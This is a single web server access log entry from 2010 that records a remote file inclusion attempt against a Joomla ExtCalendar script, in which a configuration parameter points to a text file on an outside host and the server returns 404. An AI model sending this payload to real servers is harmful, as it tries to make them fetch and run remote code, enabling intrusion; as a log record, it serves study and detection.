116.127.121.117 - - [01/Mar/2010:21:54:14 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
